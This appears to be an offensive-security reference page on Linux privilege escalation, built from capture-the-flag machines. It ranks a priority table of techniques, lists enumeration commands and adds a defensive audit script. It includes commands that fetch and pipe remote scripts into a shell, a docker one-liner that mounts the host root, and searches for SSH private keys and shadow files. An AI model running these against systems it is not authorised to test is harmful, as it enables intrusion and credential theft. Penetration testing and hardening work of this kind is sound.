Linux Privilege Escalation
# Overview
Linux privilege escalation is the process of elevating from a low-privilege user (www-data, apache, nobody, service accounts) to root. Linux privesc follows a structured methodology: automated enumeration for low-hanging fruit, then manual deep-dive into specific techniques. The kernel, file permissions, scheduled tasks, and service misconfigurations are the primary attack surfaces.
# Priority Order
| Priority | Technique | Key Command | Effort | Success Rate |
|---|---|---|---|---|
| 1 | sudo -l | sudo -l | Minimal | High |
| 2 | SUID binaries | find / -perm -4000 -type f 2>/dev/null | Low | High |
| 3 | Capabilities | getcap -r / 2>/dev/null | Low | Medium |
| 4 | Cron jobs | Check /etc/crontab, pspy | Medium | Medium |
| 5 | Writable systemd services | find /etc/systemd -writable | Medium | Medium |
| 6 | Docker group | id then docker run -v /:/host -it alpine chroot /host | Low | High |
| 7 | Writable /etc/passwd | Check permissions on /etc/passwd | Low | High |
| 8 | Password/key hunting | find / -name id_rsa, grep configs | Medium | Medium |
| 9 | NFS no_root_squash | showmount -e, mount + SUID | Medium | Medium |
| 10 | Library hijacking | LD_PRELOAD, ld.so.preload, RPATH | Medium | Medium |
| 11 | Symlink/race conditions | Writable dirs + root-owned write ops | High | Low-Medium |
| 12 | Kernel exploits | uname -a, exploit suggester | High | Medium |
# Automated Enumeration First
Always start with automated tools before manual hunting:
```bash
# linpeas (most comprehensive)
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# Alternative: LinEnum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh && chmod +x LinEnum.sh && ./LinEnum.sh
# pspy (watch processes without root)
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 && chmod +x pspy64 && ./pspy64
```
# Manual Verification Priority
After automated enumeration, verify these in order:
```bash
# 1. Sudo
sudo -l 2>/dev/null
# 2. SUID
find / -perm -4000 -type f 2>/dev/null
# 3. Capabilities
getcap -r / 2>/dev/null
# 4. Cron
cat /etc/crontab 2>/dev/null
ls -la /etc/cron.* 2>/dev/null
# 5. Writable files owned by root in PATH directories
find / -writable -user root -type f 2>/dev/null | grep -v proc
# 6. Docker
id | grep docker
# 7. /etc/passwd writable
ls -la /etc/passwd /etc/shadow
# 8. SSH keys
find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
# 9. Kernel
uname -a
cat /etc/os-release
```
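The same verification list, turned into a defensive audit that reports what an attacker would find so it can be fixed first. This is an added example written for this page, not code from the page or from any of the tools it lists; the function names, the baseline file format (one absolute path per line) and the ROOT argument (a test tree instead of `/`) are assumptions.

```bash
#!/bin/sh
# Hypothetical audit helper written for this page, not the page's own code: it
# checks the manual verification items against ROOT (default /) so a defender
# can fix them first; passing a test tree as ROOT runs the checks offline.

# SUID files under ROOT, printed as absolute paths relative to ROOT, sorted.
list_suid() {
  root="${1:-/}"
  find "$root" -xdev -type f -perm -4000 2>/dev/null | sed "s#^$root/*#/#" | sort
}

# SUID files absent from a baseline file (assumed format: one path per line);
# anything new here is a finding, e.g. a copied shell or cp marked SUID.
suid_outside_baseline() {
  root="${1:-/}"; baseline="${2:-/dev/null}"
  list_suid "$root" | grep -vxF -f "$baseline"
  return 0
}

# Group- or world-writable entries among /etc/passwd, /etc/shadow, /etc/crontab,
# /etc/cron.* and /etc/systemd under ROOT; any hit is a finding.
writable_sensitive() {
  root="${1:-/}"
  for p in "$root/etc/passwd" "$root/etc/shadow" "$root/etc/crontab" \
           "$root"/etc/cron.* "$root/etc/systemd"; do
    [ -e "$p" ] || continue
    find "$p" \( -perm -020 -o -perm -002 \) 2>/dev/null
  done | sed "s#^$root/*#/#" | sort
  return 0
}

# Members of the docker group in ROOT/etc/group; docker membership is root-equivalent.
docker_group_members() {
  awk -F: '$1 == "docker" && $4 != "" { print $4 }' "${1:-/}/etc/group" 2>/dev/null
  return 0
}

# Run every check, print findings grouped by check, return 1 if any were found.
audit_host() {
  root="${1:-/}"; baseline="${2:-/dev/null}"; found=0
  for check in suid_outside_baseline writable_sensitive docker_group_members; do
    out=$("$check" "$root" "$baseline")
    if [ -n "$out" ]; then
      found=1; printf '[%s]\n%s\n' "$check" "$out"
    fi
  done
  return "$found"
}
# Direct use: sh privesc_audit.sh / /etc/suid.baseline (no args: define functions only).
if [ "$#" -gt 0 ]; then audit_host "$@"; fi
```

Generate the baseline with `list_suid / > /etc/suid.baseline` on a freshly built host and re-run the audit from cron; a non-zero exit status means a new SUID file, a loosened permission or a new docker member appeared since the baseline.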
# Cross-References
## Tool References
| Tool | Link |
|---|---|
| linpeas | https://github.com/carlospolop/PEASS-ng |
| LinEnum | https://github.com/rebootuser/LinEnum |
| pspy | https://github.com/DominicBreuker/pspy |
| GTFOBins | https://gtfobins.github.io/ |
| linux-exploit-suggester | https://github.com/mzet-/linux-exploit-suggester |
## Source Machines
- Help (Easy, Linux) - Kernel exploit (4.4.0-116-generic)
- Intentions (Hard, Linux) - Capability abuse (CAP_DAC_READ_SEARCH)
- Sau (Easy, Linux) - Sudo misconfiguration (systemctl status + pager escape)
- Monitored (Medium, Linux) - Sudo + symlink attack on getprofile.sh
- Soccer (Easy, Linux) - doas + dstat plugin execution
- Cerberus (Hard, Linux) - Firejail SUID CVE-2022-31214 container breakout